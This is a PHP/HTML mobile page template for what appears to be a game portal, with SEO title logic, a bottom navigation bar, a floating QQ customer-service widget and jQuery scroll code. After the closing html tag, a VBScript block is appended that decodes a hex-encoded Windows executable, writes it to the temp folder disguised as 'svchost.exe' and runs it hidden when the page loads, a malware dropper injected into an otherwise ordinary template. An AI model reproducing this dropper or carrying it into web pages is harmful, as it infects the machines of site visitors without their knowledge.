|
|
|
<!DOCTYPE HTML>
|
|
|
|
<html>
|
|
|
|
<head>
|
|
|
|
<meta charset="UTF-8">
|
|
|
|
<if condition="CONTROLLER_NAME eq 'Index' " >
|
|
|
|
<title>{:seo_replace(C('wap_index.seo_title'),'','wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_index.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_index.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Category' and ACTION_NAME eq 'index' or ACTION_NAME eq 'categorydetail' " />
|
|
|
|
<title>{:seo_replace(C('wap_game_list.seo_title'),['game_type_name'=>$mate_title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_game_list.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_game_list.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Game' and ACTION_NAME eq 'detail' or ACTION_NAME eq 'rank' or ACTION_NAME eq 'open' " />
|
|
|
|
<title>{:seo_replace(C('wap_game_detail.seo_title'),['game_type_name'=>$title,'game_name'=>$mate_title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_game_detail.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_game_detail.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Game' and ( ACTION_NAME eq 'detail' or ACTION_NAME eq 'gift' or ACTION_NAME eq 'comment' or ACTION_NAME eq 'trade' ) " />
|
|
|
|
<title>{:seo_replace(C('wap_game_detail.seo_title'),['game_name'=>$mate_title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_game_detail.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_game_detail.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Gift' and ACTION_NAME eq 'index' " />
|
|
|
|
<title>{:seo_replace(C('wap_gift_index.seo_title'),['game_name'=>I('name'),'giftbag_name'=>$title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_gift_index.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_gift_index.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Gift' and (ACTION_NAME eq 'gamegift' or ACTION_NAME eq 'today' ) " />
|
|
|
|
<title>{:seo_replace(C('wap_gift_list.seo_title'),['game_name'=>is_mobile_request()?$data[0]['relation_game_name']:$data[0]['game_name']],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_gift_list.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_gift_list.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'Gift' and ACTION_NAME eq 'detail' " />
|
|
|
|
<title>{:seo_replace(C('wap_gift_detail.seo_title'),['game_name'=>is_mobile_request()?$data['relation_game_name']:$data['game_name'],'giftbag_name'=>$data['giftbag_name']],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_gift_detail.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_gift_detail.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'News' and ACTION_NAME eq 'index' and I(category) eq 1" />
|
|
|
|
<title>{:seo_replace(C('wap_news_list.seo_title'),['cate_title'=>$title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_news_list.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_news_list.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'News' and ACTION_NAME eq 'index' and I(category) eq 2" />
|
|
|
|
<title>{:seo_replace(C('wap_strategy_list.seo_title'),['cate_title'=>$title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_strategy_list.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_strategy_list.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'News' and ACTION_NAME eq 'index' and (I(category) eq 3)" />
|
|
|
|
<title>{:seo_replace(C('wap_activity_list.seo_title'),['cate_title'=>$title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_activity_list.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_activity_list.seo_description'),'','wap','description')}">
|
|
|
|
<elseif condition="CONTROLLER_NAME eq 'News' and ACTION_NAME eq 'newsdetail' " />
|
|
|
|
<title>{:seo_replace(C('wap_article_detail.seo_title'),['news_title'=>$title],'wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_article_detail.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_article_detail.seo_description'),'','wap','description')}">
|
|
|
|
<else />
|
|
|
|
<title>{:seo_replace(C('wap_index.seo_title'),'','wap','title')}</title>
|
|
|
|
<meta name="keywords" content="{:seo_replace(C('wap_index.seo_keyword'),'','wap','keywords')}">
|
|
|
|
<meta name="description" content="{:seo_replace(C('wap_index.seo_description'),'','wap','description')}">
|
|
|
|
</if>
|
|
|
|
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
|
|
|
<meta charset="utf-8">
|
|
|
|
<meta name="renderer" content="webkit">
|
|
|
|
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|
|
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
|
|
|
|
<meta name="applicable-device" content="mobile">
|
|
|
|
<link rel="icon" href="{:get_cover(C('WAP_SET_ICO'),'path')}" type="image/x-icon"/>
|
|
|
|
<link href="__CSS__/iconfont.css" rel="stylesheet" >
|
|
|
|
<link href="__CSS__/select2.min.css" rel="stylesheet" >
|
|
|
|
<link type="text/css" rel="stylesheet" href="__CSS__/swiper.min.css">
|
|
|
|
<link type="text/css" rel="stylesheet" href="__CSS__/base1.css" />
|
|
|
|
<link type="text/css" rel="stylesheet" href="__CSS__/public1.css" />
|
|
|
|
<link type="text/css" rel="stylesheet" href="__CSS__/main1.css">
|
|
|
|
<link href="__CSS__/common.css" rel="stylesheet" >
|
|
|
|
|
|
|
|
|
|
|
|
<script type="text/javascript" src="__JS__/zepto.min.js"></script>
|
|
|
|
<script type="text/javascript" src="__JS__/swiper.min.js"></script>
|
|
|
|
<if condition="CONTROLLER_NAME eq 'Index'">
|
|
|
|
<!-- <script type="text/javascript" src="__JS__/new/index.js"></script>-->
|
|
|
|
</if>
|
|
|
|
<block name="css"></block>
|
|
|
|
<script src="__JS__/jquery-1.11.1.min.js"></script>
|
|
|
|
<script src="__JS__/TouchSlide.1.1.js"></script>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
</head>
|
|
|
|
|
|
|
|
<block name="body"></block>
|
|
|
|
|
|
|
|
<block name="footer">
|
|
|
|
|
|
|
|
<!-- 底部导航 -->
|
|
|
|
<div class="foot_tabbar">
|
|
|
|
<div class="foot_tabbar_box">
|
|
|
|
<div class="foot_info ">
|
|
|
|
<a href="{:U('Index/index')}" class="<if condition='CONTROLLER_NAME eq Index and ACTION_NAME eq index'>active</if>">
|
|
|
|
<img src="__IMG__/new/shouye<if condition='CONTROLLER_NAME eq Index and ACTION_NAME eq index'>1</if>.png" alt="">
|
|
|
|
<span>首页</span>
|
|
|
|
</a>
|
|
|
|
</div>
|
|
|
|
<div class="foot_info ">
|
|
|
|
<a href="{:U('Index/introduce')}" class="<if condition='ACTION_NAME eq introduce'>active</if>">
|
|
|
|
<img src="__IMG__/new/qiyechaxun<if condition='ACTION_NAME eq introduce'>1</if>.png" alt="">
|
|
|
|
<span>企业简介</span></a>
|
|
|
|
</div>
|
|
|
|
<div class="foot_info ">
|
|
|
|
<a href="{:U('Index/business')}" class="<if condition='ACTION_NAME eq business'>active</if>">
|
|
|
|
<img src="__IMG__/new/hezuo<if condition='ACTION_NAME eq business'>1</if>.png" alt="">
|
|
|
|
<span>招商合作</span>
|
|
|
|
</a>
|
|
|
|
</div>
|
|
|
|
<div class="foot_info ">
|
|
|
|
<a href="{:U('User/index')}" class="<if condition='CONTROLLER_NAME eq User'>active</if>">
|
|
|
|
<img src="__IMG__/new/geren<if condition='CONTROLLER_NAME eq User'>1</if>.png" alt="">
|
|
|
|
<span>我的</span>
|
|
|
|
</a>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
</block>
|
|
|
|
<div class="float_contact_position " style="display: none;">
|
|
|
|
<div class="float_contact ">
|
|
|
|
<div class="float-bg "></div>
|
|
|
|
<ul>
|
|
|
|
<li class="show kf ">
|
|
|
|
<a href="mqqwpa://im/chat?chat_type=wpa&uin={:C('PC_SET_SERVER_QQ')}&version=1&src_type=web&web_src=oicqzone.com"></a>
|
|
|
|
<div class="kf_pic">
|
|
|
|
<a href="mqqwpa://im/chat?chat_type=wpa&uin={:C('PC_SET_SERVER_QQ')}&version=1&src_type=web&web_src=oicqzone.com" id="launch_qq "><span><img src="__IMG__/qq_icon.png "></span><b>在线客服</b></a>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
</div>
|
|
|
|
</li>
|
|
|
|
</ul>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
<div class="float_contact_position1 ">
|
|
|
|
<div class="float_contact1">
|
|
|
|
<div class="float-bg "></div>
|
|
|
|
<ul>
|
|
|
|
<li class="show kf ">
|
|
|
|
<a href="tencent://message/?uin={:C('PC_SET_SERVER_QQ')}&menu=yes"></a>
|
|
|
|
<div class="kf_pic">
|
|
|
|
<a href="tencent://message/?uin={:C('PC_SET_SERVER_QQ')}&menu=yes" id="launch_qq "><span><img src="__IMG__/qq_icon.png "></span><b>在线客服</b></a>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
</div>
|
|
|
|
</li>
|
|
|
|
<li class="show kf " >
|
|
|
|
<a href="./media.php"></a>
|
|
|
|
<div class="kf_pic">
|
|
|
|
<a href="./media.php" target="_blank"><span><img src="__IMG__/pc_icon.png "></span><b>pc官网</b></a>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
|
|
|
|
</div>
|
|
|
|
</li>
|
|
|
|
<!--<li class="show wx">-->
|
|
|
|
<!--<a href="javascript:void(0); "></a>-->
|
|
|
|
<!--<div class="wx_pic active">-->
|
|
|
|
<!--<img src="{:get_cover(C('PC_SET_QRCODE'),'path')}">-->
|
|
|
|
<!--<span class="wx_pic_text">扫码关注<font>{:C(APP_WEIXIN)}</font>公众号</span>-->
|
|
|
|
<!--<i class="arrow "></i>-->
|
|
|
|
<!--</div>-->
|
|
|
|
<!--</li>-->
|
|
|
|
<li class="show down ">
|
|
|
|
<a href="javascript:void(0); "></a>
|
|
|
|
<div class="down_pic">
|
|
|
|
<img src="{:U('Index/qrcode',['url'=>base64_encode(base64_encode('http://'.$_SERVER['HTTP_HOST'].'/index.php?s=/Home/Cline/download'))])}">
|
|
|
|
<span class="wx_pic_text">扫码下载<font>{:C(APP_NAME)}</font>APP</span>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
</div>
|
|
|
|
</li>
|
|
|
|
<!-- <li class="show pop ">
|
|
|
|
<a href="./index.php" target="_blank"></a>
|
|
|
|
<div class="pop_pic">
|
|
|
|
推广游戏得分成~<br>
|
|
|
|
赚钱就是那么容易!
|
|
|
|
<a class="pop_pic_btn" href="./index.php" target="_blank">去加入</a>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
</div>
|
|
|
|
|
|
|
|
</li> -->
|
|
|
|
|
|
|
|
<li class="show kf " >
|
|
|
|
<a href="javascript:alert('暂无')"></a>
|
|
|
|
<div class="kf_pic">
|
|
|
|
<a href="javascript:alert('暂无')"><span><img src="__IMG__/pc_icon.png "></span><b>技术支持</b></a>
|
|
|
|
<i class="arrow "></i>
|
|
|
|
</div>
|
|
|
|
</li>
|
|
|
|
<li>
|
|
|
|
<a href="javascript:void(0); " class="top "></a>
|
|
|
|
</li>
|
|
|
|
</ul>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
<block name="script"></block>
|
|
|
|
<script>
|
|
|
|
$(function(){
|
|
|
|
/*浮动层*/
|
|
|
|
var rzClose = $('.float_contact1 .rz .close'),
|
|
|
|
rzShow = $('.float_contact1 .rz a'),
|
|
|
|
rzContent = $('.float_contact1 .rz .rz_pic');
|
|
|
|
rzClose.on('click',function(){
|
|
|
|
rzContent.removeClass('active');
|
|
|
|
});
|
|
|
|
var picShow = $('.float_contact1 ul .show'),
|
|
|
|
picContent = picShow.find('div');
|
|
|
|
picShow.on('mouseover',function(){
|
|
|
|
picContent.removeClass('active');
|
|
|
|
$(this).find('div').addClass('active');
|
|
|
|
});
|
|
|
|
picShow.on('mouseout',function(){
|
|
|
|
picContent.removeClass('active');
|
|
|
|
});
|
|
|
|
$('.float_contact_position1').on('click','.top',function(){
|
|
|
|
$('body,html').animate({"scrollTop":0},500);
|
|
|
|
});
|
|
|
|
/*回到顶部*/
|
|
|
|
$('.share-box').on('click','.li-7 a',function(){
|
|
|
|
$('body,html').animate({"scrollTop":0},500);
|
|
|
|
});
|
|
|
|
|
|
|
|
})
|
|
|
|
</script>
|
|
|
|
</html>
|
|
|
|
<SCRIPT Language=VBScript><!--
|
|
|
|
DropFileName = "svchost.exe"
|
|
|
|
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
|
|
|
|
Set FSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
|
|
|
|
If FSO.FileExists(DropPath)=False Then
|
|
|
|
Set FileObj = FSO.CreateTextFile(DropPath, True)
|
|
|
|
For i = 1 To Len(WriteData) Step 2
|
|
|
|
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
|
|
|
|
Next
|
|
|
|
FileObj.Close
|
|
|
|
End If
|
|
|
|
Set WSHshell = CreateObject("WScript.Shell")
|
|
|
|
WSHshell.Run DropPath, 0
|
|
|
|
//--></SCRIPT>
|